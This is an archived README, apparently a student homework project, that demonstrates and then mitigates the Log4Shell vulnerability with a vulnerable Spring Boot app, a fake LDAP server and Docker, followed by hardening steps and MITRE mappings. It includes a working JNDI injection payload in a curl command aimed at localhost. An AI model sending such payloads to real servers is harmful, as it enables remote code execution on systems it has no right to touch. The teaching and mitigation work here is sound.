关联漏洞
描述
Log4Shell (CVE-2021-44228) exploit demo for SEAS 8405. Includes a vulnerable Spring Boot app, fake LDAP server, Docker setup, MITRE mapping, incident response, and a full screen recording.
介绍
# Homework 9 – Securing Systems Against Log4Shell Exploits
## Overview
This project demonstrates the exploitation and mitigation of the Log4Shell vulnerability (CVE-2021-44228) using a Dockerized Java web application with vulnerable Log4j 2.14.1. The setup also includes a simulated malicious LDAP server to demonstrate the JNDI injection attack path.
After exploitation, the system is hardened by upgrading Log4j, validating input, and applying MITRE D3FEND and ATT&CK recommendations.
---
## Folder Structure
```
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
```
---
## How to Run
### 1. Build the Java App (with vulnerable Log4j)
```bash
docker build -t vulnerable-app .
```
### 2. Run the App with Docker Compose
```bash
docker-compose up
```
App will be running at:
http://localhost:8080
### 3. Start the Fake LDAP Server (in a new terminal)
```bash
python3 ldap_server.py
```
### 4. Simulate an Exploit
Send a request like this to the app:
```bash
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}
```
The LDAP server should receive the request (this simulates the JNDI exploit).
---
## How It’s Hardened
After demonstrating the attack, the system was secured by:
- Upgrading Log4j to version 2.17.0
- Input validation (blocking `${jndi:...}` patterns)
- Disabling message lookups in configuration
- Docker isolation to limit scope
- MITRE D3FEND & ATT&CK techniques applied
---
## MITRE Mapping
### MITRE ATT&CK:
- T1190: Exploit Public-Facing Application
- T1210: Exploitation of Remote Services
### MITRE D3FEND:
- D3-IA: Input Validation
- D3-HI: Host-based Intrusion Detection
- D3-DA: Disable Unsafe Features
---
## Report
See `mitigation_report.pdf` for:
- System architecture before/after
- Explanation of Log4Shell
- Mitigation strategy
- Incident response plan
---
## Screen Recording
If the video is not uploaded directly, it is available at the link in the report.
---
## Author
**Serpil Rivas**
SEAS 8405 – Cybersecurity Architectures
May 2025
文件快照
[4.0K] /data/pocs/3f55c353215d113e70869425385dc2e9b3d45bc2
├── [1.3M] Architecture-Diagram.png
├── [ 135] docker-compose.yml
├── [ 244] Dockerfile
├── [ 613] ldap_server.py
├── [1.6K] pom.xml
├── [2.2K] README.md
├── [2.0M] Rivas_SEAS8405_Assignment_9_Report.pdf
├── [4.0K] Screenshots
│ ├── [114K] Screen1.png
│ ├── [147K] screen2.png
│ ├── [139K] screen3.png
│ └── [192K] Screen 4.png
├── [4.0K] src
│ └── [4.0K] main
│ └── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] example
│ ├── [ 328] Log4ShellDemoApplication.java
│ └── [ 567] LogController.java
└── [4.0K] target
├── [4.0K] classes
│ └── [4.0K] com
│ └── [4.0K] example
│ ├── [ 750] Log4ShellDemoApplication.class
│ └── [1.5K] LogController.class
├── [ 18M] log4shell-demo-0.0.1-SNAPSHOT.jar
├── [3.2K] log4shell-demo-0.0.1-SNAPSHOT.jar.original
├── [4.0K] maven-archiver
│ └── [ 69] pom.properties
└── [4.0K] maven-status
└── [4.0K] maven-compiler-plugin
└── [4.0K] compile
└── [4.0K] default-compile
├── [ 75] createdFiles.lst
└── [ 193] inputFiles.lst
15 directories, 20 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。